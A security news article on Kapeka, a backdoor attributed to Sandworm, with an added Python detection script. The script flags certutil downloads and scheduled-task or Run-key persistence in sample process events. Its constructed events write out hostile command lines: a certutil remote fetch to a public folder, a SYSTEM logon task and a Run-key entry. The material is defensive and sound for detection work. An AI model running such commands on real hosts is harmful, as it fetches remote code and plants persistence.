A previously undocumented “flexible” backdoor called Kapeka has been observed “sporadically” in cyberattacks against Eastern Europe, including Estonia and Ukraine, since at least mid-2022.
The findings come from Finnish cybersecurity firm WithSecure, which attributed the malware to the Russia-linked advanced persistent threat (APT) group tracked as Sandworm (also known as APT44 or Seashell Blizzard). Microsoft tracks the same malware under the name KnuckleTouch.
“The malware […] is a flexible backdoor with all the necessary features to serve as an early-stage toolkit for its operators and also to provide long-term access to victims’ assets,” said security researcher Mohammad Kazem Hassan Nejad.
Kapeka comes with a dropper designed to launch and run the backdoor component on the infected host, after which it removes itself. The dropper is also responsible for establishing persistence for the backdoor, either as a scheduled task or as an autorun registry entry, depending on whether the process has SYSTEM privileges.
Microsoft, in its own advisory released in February 2024, described Kapeka as being involved in multiple campaigns distributing ransomware, and said it can be used to perform a variety of functions, such as stealing credentials and other data, conducting destructive attacks, and granting threat actors remote access to the device.
The backdoor is a Windows DLL written in C++ with a built-in command-and-control (C2) configuration used to establish contact with an actor-controlled server; the configuration also specifies how often the server must be polled to retrieve commands.
In addition to masquerading as a Microsoft Word add-in to appear authentic, the backdoor DLL collects information about the compromised host and uses multi-threading to fetch incoming instructions, process them, and exfiltrate the execution results to the C2 server.
“The backdoor uses the WinHttp 5.1 COM interface (winhttpcom.dll) to implement its network communications component,” Nejad explained. “The backdoor communicates with its C2 to poll for tasks and send information with fingerprints and task results. The backdoor uses JSON to send and receive information from its C2.”
The implant is also able to update its C2 configuration on the fly by receiving a new version from the C2 server during polling. Some of the backdoor’s key features allow it to read and write files to and from disk, launch payloads, execute shell commands, and even update and uninstall itself.
The exact method by which the malware is propagated is currently unknown. However, Microsoft noted that the dropper is retrieved from compromised websites using the certutil utility, highlighting the use of a legitimate living-off-the-land binary (LOLBin) to orchestrate the attack.
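The two behaviours the article describes, a certutil fetch from a remote site followed by the downloaded file setting up persistence as a scheduled task or a Run key, are both visible in ordinary process-creation telemetry. The script below is an added example written for this page (it is not WithSecure’s or Microsoft’s code) showing how a defender can flag each behaviour and then correlate them into a fetch-then-persist chain. It assumes Sysmon-style field names (Image, CommandLine, ParentImage, IntegrityLevel); the events, file paths, task name and host are all constructed for the example.

```python
import re

# Constructed process-creation events (Sysmon Event ID 1 style, flattened to
# dicts). Invented for this example; not real telemetry from any incident.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://example.invalid/update.bin C:\Users\Public\update.bin",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "IntegrityLevel": "Medium"},
    {"Image": r"C:\Windows\System32\certutil.exe",           # benign use: hashing a file
     "CommandLine": r"certutil.exe -hashfile C:\tools\installer.msi SHA256",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "IntegrityLevel": "Medium"},
    {"Image": r"C:\Windows\System32\schtasks.exe",           # persistence from a SYSTEM-level process
     "CommandLine": r'schtasks.exe /Create /SC ONLOGON /TN "Updater" /TR C:\Users\Public\update.bin /RU SYSTEM',
     "ParentImage": r"C:\Users\Public\update.bin", "IntegrityLevel": "System"},
    {"Image": r"C:\Windows\System32\reg.exe",                # Run-key persistence from a user-level process
     "CommandLine": r"reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /t REG_SZ /d C:\Users\alice\AppData\Local\Temp\stage.exe",
     "ParentImage": r"C:\Users\alice\AppData\Local\Temp\stage.exe", "IntegrityLevel": "Medium"},
    {"Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": r'"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" /n',
     "ParentImage": r"C:\Windows\explorer.exe", "IntegrityLevel": "Medium"},
]

URL_RE = re.compile(r"\bhttps?://", re.IGNORECASE)
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run(Once)?\b", re.IGNORECASE)


def classify(event):
    """Return the list of detection tags that apply to one process-creation event."""
    image = event["Image"].rsplit("\\", 1)[-1].lower()
    cmd = event["CommandLine"]
    tags = []
    # certutil is a legitimate tool; only flag it when a URL appears on the command
    # line, which is the LOLBin download pattern the article attributes to the dropper.
    if image == "certutil.exe" and URL_RE.search(cmd):
        tags.append("certutil_remote_fetch")
    # Persistence set-up via a scheduled task (typical when running as SYSTEM).
    if image == "schtasks.exe" and re.search(r"/create\b", cmd, re.IGNORECASE):
        tags.append("persistence_scheduled_task")
    # Persistence set-up via an autorun (Run/RunOnce) registry key.
    if image == "reg.exe" and re.search(r"\badd\b", cmd, re.IGNORECASE) and RUN_KEY_RE.search(cmd):
        tags.append("persistence_run_key")
    return tags


def fetched_path(event):
    """For a certutil fetch, return the local output path (the last argument).
    certutil -urlcache -split -f <URL> <outfile> writes the response body to <outfile>;
    if no output path is given the last token is the URL and we return None."""
    tokens = event["CommandLine"].split()
    if len(tokens) < 2 or URL_RE.match(tokens[-1]):
        return None
    return tokens[-1]


def find_dropper_chains(events):
    """Link each certutil remote fetch to any later persistence set-up whose parent
    process is the file certutil wrote: the fetch-then-persist sequence the article
    describes for the Kapeka dropper. Returns one dict per chain found."""
    chains = []
    for i, ev in enumerate(events):
        if "certutil_remote_fetch" not in classify(ev):
            continue
        target = fetched_path(ev)
        if target is None:
            continue
        for later in events[i + 1:]:
            tags = [t for t in classify(later) if t.startswith("persistence_")]
            if tags and later["ParentImage"].lower() == target.lower():
                chains.append({"downloaded_file": target,
                               "persistence": tags[0],
                               "integrity": later["IntegrityLevel"]})
    return chains


if __name__ == "__main__":
    for idx, ev in enumerate(SAMPLE_EVENTS):
        tags = classify(ev)
        if tags:
            print(f"event {idx}: {', '.join(tags)} <- {ev['CommandLine']}")
    for chain in find_dropper_chains(SAMPLE_EVENTS):
        print("fetch-then-persist chain:", chain)
```

Run on the constructed events, the hashing invocation of certutil and the Word launch stay quiet, the download, the scheduled-task creation and the Run-key write are each tagged, and the correlation step ties the scheduled task back to the file certutil wrote, since that task was created by the downloaded file from a SYSTEM-level process. The Run-key event is flagged on its own but forms no chain, because nothing in the sample shows how its parent arrived on the host.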
Kapeka’s links to Sandworm stem from conceptual and configuration overlaps with previously disclosed families such as GreyEnergy, a likely successor to the BlackEnergy toolkit, and Prestige.
“It is likely that Kapeka was used in the intrusions that led to the distribution of the Prestige ransomware in late 2022,” WithSecure said. “It is likely that Kapeka is the successor to GreyEnergy, which in turn was likely a replacement for BlackEnergy in Sandworm’s arsenal.”
“The backdoor victimology, infrequent sightings, and level of stealth and sophistication indicate APT-level activity, highly likely of Russian origin.”